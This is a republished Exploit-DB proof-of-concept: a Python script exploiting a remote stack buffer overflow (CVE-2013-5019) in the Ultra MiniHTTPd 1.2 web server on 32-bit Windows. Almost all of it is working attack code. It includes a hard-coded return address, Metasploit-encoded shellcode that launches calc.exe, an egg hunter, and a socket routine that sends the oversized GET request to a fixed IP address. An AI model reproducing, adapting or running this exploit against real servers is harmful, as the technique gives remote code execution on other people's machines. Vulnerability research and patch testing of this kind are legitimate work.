Ultra MiniHTTPd 1.2 – ‘GET’ Remote Stack Buffer Overflow (PoC) - 体验盒子

作者： jollymongrel

日期： 2018-04-17

类别：

local

平台：

windows_x86

来源：https://www.exploit-db.com/exploits/44472/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

52

53

54

55

56

57

58

59

60

61

62

# Exploit Title: Ultra MiniHTTPd 1.2 - 'GET' Remote Stack Buffer Overflow

# Date: 2018-04-14

# Exploit Author: jollymongrel

# Vendor Homepage: http://www.vector.co.jp

# Software Link: http://www.vector.co.jp/soft/winnt/net/se275154.html

# Version: 1.2

# Tested on: Windows 7 32-bit

# CVE : CVE-2013-5019

import sys

import socket

import struct

eip = struct.pack('I', 0x764046cd) #call esp [msvcrt.dll]

#windows/exec - 274 bytes

#http://www.metasploit.com

#Encoder: x86/shikata_ga_nai

#EXITFUNC=thread

#CMD=calc.exe

#badchars='\x00\x09\x0a\x0b\x0c\x0d\x20\x2f\x3f'

shellcode = ("no0bno0b"+"\xb8\x21\xa0\xa2\xbd\xdb\xd1\xd9\x74\x24\xf4\x5b\x31\xc9\xb1"

"\x3e\x31\x43\x15\x83\xc3\x04\x03\x43\x11\xe2\xd4\x1a\x51\xd8"

"\x25\xbd\x4c\xf4\x90\x35\x55\x0f\x79\x9f\x5c\x5e\x45\x5c\xb5"

"\x5d\x84\x31\x44\x9d\x46\xde\x89\xb2\x1a\x92\xe6\x1d\x26\x1d"

"\xa1\xb0\xfa\x6c\x5a\x1e\xf7\xb7\xb6\xfb\x71\xbf\x2a\x51\xb6"

"\x2a\x53\x27\x2a\x43\x49\x67\xe7\x66\x6a\x6e\xe3\x10\x46\x27"

"\xe5\x1f\xc5\xb5\xad\x32\x57\x38\xd3\x66\xa8\xa7\xf8\xe0\xfc"

"\x1a\x33\xce\x22\xf0\xad\x34\xff\x3a\x42\x91\x07\x6d\xe5\xf1"

"\x79\x73\xa3\xe9\xbf\xd7\xbf\xa7\x10\x06\xf2\x2c\x81\x6a\xa0"

"\x97\x46\xae\xe7\x33\x1c\x87\x02\x5d\x8d\xd7\x5a\xbe\x7c\xa9"

"\x96\x7f\x04\xbd\xe4\xb5\xbc\xa0\xf5\xf3\x12\x66\x6c\xbc\xb7"

"\xb2\x49\x01\x66\xd3\x8f\x40\x5b\x33\x07\x22\x30\x0e\x11\xc6"

"\x89\xfa\xbc\x18\x0f\x33\x18\xb1\x01\xe0\x53\x4a\x23\xab\x77"

"\x17\x7f\xf8\x4f\xdd\x01\x79\x04\xa6\x82\xe0\xc4\x33\x06\x12"

"\x36\x43\x2d\xc6\x8a\xfb\x24\x67\x4a\xc6\x5a\x4a\x4c\x97\x4c"

"\x1b\x68\x98\xf8\x45\x2d\x86\x43\xbe\x0e\x96\x8f\xca\x89\x7e"

"\x5b\xe1\x8b\xb2\x5f\xd0\x94\xdf\x5e\x7c\x0e\x25\xa5\xf7\xea"

"\x9d\x1b\xa9\x58\x50\x3a\xb8\x77\x16\xb1\x87\x48\x94\x37\x87"

"\x9a\x9d\xe2\xd0")

#egg hunter to search for no0bno0b

egghunter = ("\x66\x81\xca\xff\x0f\x42\x52\x6a\x02\x58\xcd\x2e\x3c\x05\x5a\x74"

"\xef\xb8\x6e\x6f\x30\x62\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7")

payload = "A" * 537

payload += shellcode

payload += "A" * (967 - len(payload))

payload += eip

payload += egghunter

payload += "\xff\xe7" #jmp edi

payload += "C" * (1007 - len(payload))

print "[+] sending payload, length", len(payload)

buf = "GET /"+payload+"HTTP/1.1\r\n\r\n"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

s.connect(("192.168.32.175", 80))

s.send(buf)

data = s.recv(1024)

s.close()